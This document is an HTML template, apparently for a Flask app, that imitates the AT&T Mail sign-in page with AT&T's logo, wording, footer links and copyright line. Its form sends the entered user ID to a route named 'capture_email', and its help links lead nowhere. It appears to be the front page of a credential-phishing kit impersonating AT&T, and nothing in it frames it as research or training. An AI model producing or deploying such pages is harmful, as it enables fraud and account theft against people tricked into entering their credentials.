<!DOCTYPE html>
<html lang="en">
<head>
  <meta charset="UTF-8" />
  <meta name="viewport" content="width=device-width, initial-scale=1" />
  <title>AT&T Login</title>
  <link
    href="https://cdn.jsdelivr.net/npm/bootstrap@5.3.3/dist/css/bootstrap.min.css"
    rel="stylesheet"
  />
  <style>
    body {
      background-color: #ffffff;
    }

    .login-container {
      display: flex;
      align-items: center;
      justify-content: center;
      min-height: 100vh;
    }

    .login-box {
      width: 450px;
      padding: 20px 40px;
      border-radius: 12px;
      
      border: 1px solid #e0e0e0;
    }

    .att-logo {
      width: 170px;
      margin-bottom: 1px;
    }

    .login-title {
      font-size: 38px;
      font-weight: 700;
      margin-bottom: 1px;
    }

    .login-subtitle {
      font-size: 30px;
      font-weight: 600;
      color: #333;
      margin-bottom: 1px;
    }

    .btn-att {
 background-color: #004792;
      color: white;
      font-weight: 600;
      font-size: 16px;
      height: 50px;
      border-radius: 30px;
}

    .btn-att:hover {
      background-color: #003370;
    }

    .login-links a {
      font-size: 15px;
      font-weight: 700;
      display: block;
      margin-top: 12px;
      color: #004792;
      text-decoration: none;
    }

    .login-links a:hover {
      text-decoration: underline;
    }

    label {
      font-size: 16px;
      margin-bottom: 8px;
    }

    .form-control {
      height: 48px;
      font-size: 16px;
    }

    input::placeholder {
      font-size: 15px;
    }
  </style>
</head>
<body>
  <div class="container login-container">
    <div class="login-box text-center bg-white">
      <img
        src= "{{ url_for('static', filename='att.png') }}"
        alt="AT&T Logo"
        class="att-logo"
      />
      <div class="login-title">Sign in</div>
      <div class="login-subtitle">to access AT&T Mail and Currently.com</div>

      <form  method="POST"  action="{{ url_for('capture_email') }}" >
        <div class="mb-4 text-start">
          <label for="email" class="form-label">User ID</label>
          <input type="email" class="form-control" id="userID" name="email" placeholder="" />
        </div>

        <button type="submit" class="btn btn-att w-100 mb-3">Continue</button>

        <div class="login-links text-start">
          <a href="#">Forgot user ID?</a>
          <a href="#">Don't have a user ID? Create one now</a>
        </div>
      </form>
    </div>
  </div>
   

   <footer style="text-align: center; font-size: 13px; color: #444; margin-top: 40px;">
  <div style="margin-bottom: 8px;">
    <a href="#" style="margin: 0 12px; color: #004792; text-decoration: none;">Legal policy center</a>
    <a href="#" style="margin: 0 12px; color: #004792; text-decoration: none;">Privacy policy</a>
    <a href="#" style="margin: 0 12px; color: #004792; text-decoration: none;">Terms of use</a>
    <a href="#" style="margin: 0 12px; color: #004792; text-decoration: none;">Accessibility</a>
    <a href="#" style="margin: 0 12px; color: #004792; text-decoration: none;">Your privacy choices</a>
  </div>
  <div style="color: #666; margin-bottom: 2px ">
    ©2025 AT&T Intellectual Property. All rights reserved.
  </div>
</footer>

  <script src="https://cdn.jsdelivr.net/npm/bootstrap@5.3.3/dist/js/bootstrap.bundle.min.js"></script>
</body>
</html>
